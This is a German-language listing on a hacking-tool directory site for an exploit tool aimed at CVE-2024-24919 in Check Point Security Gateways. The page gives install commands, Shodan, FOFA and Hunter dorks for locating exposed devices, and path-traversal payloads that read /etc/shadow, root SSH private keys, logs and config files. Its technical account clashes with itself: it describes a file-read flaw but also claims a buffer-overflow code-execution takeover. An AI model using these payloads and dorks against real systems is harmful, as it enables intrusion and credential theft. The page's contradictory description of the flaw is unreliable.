Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-24919 — CVE-2024-24919 Exploit | Kitploit
Tools/GitHubGitHub/goatsecurity/cve-2024-24919
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubgoatsecurity/cve-2024-24919

CVE-2024-24919

CVE-2024-24919 Exploit

Repository anzeigen
2011vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Check Point Security Gateway RCE-Exploit-Tool (CVE-2024-24919)

Übersicht

Dieses Repository enthält ein Tool zur Ausnutzung der CVE-2024-24919-Schwachstelle in Check Point Security Gateways. Das Tool ist ein Multi-Scanner, der anfällige Geräte identifizieren kann, und ein Einzelziel-Exploit, der die vollständige Kontrolle über das betroffene Gerät übernehmen kann.

CVE-2024-24919 ist eine hochriskante Schwachstelle zur Offenlegung von Informationen, die es einem Angreifer ermöglicht, beliebige Dateien auf einem Check Point Security Gateway remote auszulesen. Diese Schwachstelle kann ausgenutzt werden, um sensible Informationen wie Passwörter und Konfigurationsdateien zu stehlen.

Haftungsausschluss:

Dieses Tool wird nur zu Bildungszwecken bereitgestellt. Es sollte nicht verwendet werden, um anfällige Systeme ohne ausdrückliche Zustimmung des Eigentümers anzugreifen. Die Autoren dieses Tools übernehmen keine Verantwortung für etwaige Schäden, die durch seine Nutzung entstehen.

Funktionsweise

Der Exploit funktioniert, indem er eine speziell präparierte HTTP-Anfrage an das anfällige Gerät sendet. Die Anfrage löst einen Pufferüberlauf in der Firmware des Geräts aus, der es dem Angreifer ermöglicht, beliebigen Code auszuführen. Der Exploit kann dann verwendet werden, um die vollständige Kontrolle über das Gerät zu übernehmen.

Anforderungen

  • Python 3
  • colorama
  • requests

Installation

root@kitploit:~
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt

Verwendung

Sie können ein einzelnes Ziel oder mehrere scannen!

root@kitploit:~
python cve-2024-24919.py

Dorks

root@kitploit:~
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"

# Shodan
SHODAN: http.title="Check Point SSL Network Extender"

# Fofa Query
FOFA: title="Check Point SSL Network Extender"

** Tool Screenshot **

ss

$ Tool-Pfade : ```

root@kitploit:~
    'aCSHELL/../../../../../../../../../../../etc/passwd',
    
    'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
    
    'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
    
    'aCSHELL/../../../../../../../../../../../var/log/syslog',
    
    'aCSHELL/../../../../../../../../../../../var/log/auth.log',
    
    #'aCSHELL/../../../../../../../../../../../var/log/messages',
    
    'aCSHELL/../../../../../../../../../../../etc/group',
    
    'aCSHELL/../../../../../../../../../../../etc/shadow',
    
    'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
    
    'aCSHELL/../../../../../../../../../../../etc/hostname',
    
    'aCSHELL/../../../../../../../../../../../etc/hosts',
    
    'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```
Tool herunterladen